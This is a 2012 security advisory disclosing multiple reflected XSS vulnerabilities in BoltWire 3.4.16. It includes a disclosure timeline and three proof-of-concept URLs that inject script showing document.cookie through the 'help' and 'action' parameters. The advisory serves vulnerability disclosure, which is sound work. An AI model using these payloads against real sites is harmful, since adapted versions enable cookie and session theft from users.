[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

BoltWire 3.4.16 Multiple XSS vulnerabilities



Advisory:		BoltWire 3.4.16 Multiple XSS vulnerabilities
Advisory ID:		SSCHADV2012-001
Author:			Stefan Schurtz
Affected Software:	Successfully tested on BoltWire 3.4.16
Vendor URL:		http://www.boltwire.com/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

BoltWire 3.4.16 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>
http://[target]/bolt/field/index.php?";</a><script>alert(document.cookie)</script></
http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt